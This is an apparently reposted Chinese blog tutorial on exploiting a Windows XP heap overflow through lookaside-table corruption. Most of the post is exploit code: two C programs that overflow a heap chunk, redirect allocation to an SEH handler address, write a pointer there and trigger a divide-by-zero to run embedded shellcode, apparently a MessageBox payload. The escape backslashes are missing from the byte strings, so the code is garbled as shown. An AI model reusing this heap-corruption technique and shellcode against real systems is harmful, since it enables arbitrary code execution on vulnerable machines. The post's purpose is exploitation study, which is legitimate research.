zoukankan html css js c++ java

利用快表lookaside进行对溢出

块表也就是 lookaside表!!!!!!

这种方法很难

条件：

1 memcpy 赋值

2 使用块表有HeapAlloc 和 HeapFree后还有赋值等

3 两次赋值

总的来说这个知识点很重要 XP 下还可以

先构造如下：

后面发现将 SEH handler 设置为 0x0012ffe4 更好些！！！！！！！！！！

#include <stdio.h>
#include <windows.h>

	char shellcode []=
	"xEBx40x90x90x90x90x90x90x90x90x90x90x90x90x90x90"//填充
	"x030x03x00x5Cx01x08x99"//填充
	"xE4xFFx12x00"//用默认异常处理函数指针所在位置覆盖
	;
void main()
{
	HLOCAL h1,h2,h3;
	HANDLE hp;
	hp = HeapCreate(0,0,0);
	__asm int 3
	h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	HeapFree(hp,0,h3);
	HeapFree(hp,0,h2);
	memcpy(h1,shellcode,300);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	memcpy(h3,"x90x1Ex39x00",4);
	int zero=0;
	zero=1/zero;
	printf("%d",zero);

}

释放之前：

第一次释放之后块表区被修改了lookaside[2] 指向被释放的块h3 块首中的下一堆块指针（因为我们先释放的h3）

经过两次释放之后块表区被修改了lookaside[2] 指向被释放的块h2 块首中的下一堆块指针

接下来看看快表的堆块：

接下来开始赋值shellcode ··············

追寻下一个申请空间函数进入发现将 lookaside[2] 的下一块首地址赋值为了我们构造的 SEH handler 0x0012ffe4

(也就是 lookaside[2] 地址的值指向的值再赋值到 lookaside[2] 地址上来)

只要向这个刚申请的空间中写入 shellcode就可以覆盖 SEH handler 接着

接着到达下面

注意这里的eax即为申请的内存地址······· 而这个地址恰恰就是两次HeapFree之后的lookaside[2]的地址指向的值

接着

(也就是 lookaside[2] 地址的值指向的值再赋值到 lookaside[2] 地址上来)

注意这里申请的地址为上一次 lookaside[2]的地址指向的值也就是我们特殊构造的 SEH handler 地址往这个地址赋值旧改变异常处理流程了

最后往里面赋值 003A1E90

触发异常后 eb 40 是我们特殊构造的这里的值不会被程序覆盖掉

最终代码：

#include <stdio.h>
#include <windows.h>

	char shellcode []=
	"xEBx40x90x90x90x90x90x90x90x90x90x90x90x90x90x90"//填充
	"x030x03x00x5Cx01x08x99"//填充
	"xb4xFFx12x00"//用默认异常处理函数指针所在位置覆盖 //根据实际情况调整

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"//填充
	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"//填充
	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"//填充

	"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
	"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
	"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
	"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
	"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
	"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
	"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
	"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
	"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
	"x53"
	"x68x64x61x30x23"
	"x68x23x50x61x6E"
	"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";

void main()
{
	HLOCAL h1,h2,h3;
	HANDLE hp;
	hp = HeapCreate(0,0,0);
	//__asm int 3
	h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	HeapFree(hp,0,h3);
	HeapFree(hp,0,h2);
	memcpy(h1,shellcode,300);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	memcpy(h3,"x90x1Ex3ax00",4);//根据实际情况调整
	int zero=0;
	zero=1/zero;
	printf("%d",zero);
}

查看全文

相关阅读:
专业术语-外文首字母组词的原词组
 SQL-常用数据类型
 phpStudy-FTP_Server插件安装使用教程
 SQL-有关数据库的提问
 phpStudy-在使用phpMyAdmin报404Error
phpStudy-坑爹的数据库管理器-phpMyAdmin的默认用户名和密码
 软件需求说明书-关键字-中英文
 Vim-命令合集
 Git-实验报告
 Git-进阶-远程仓库的使用

原文地址：https://www.cnblogs.com/zcc1414/p/3982380.html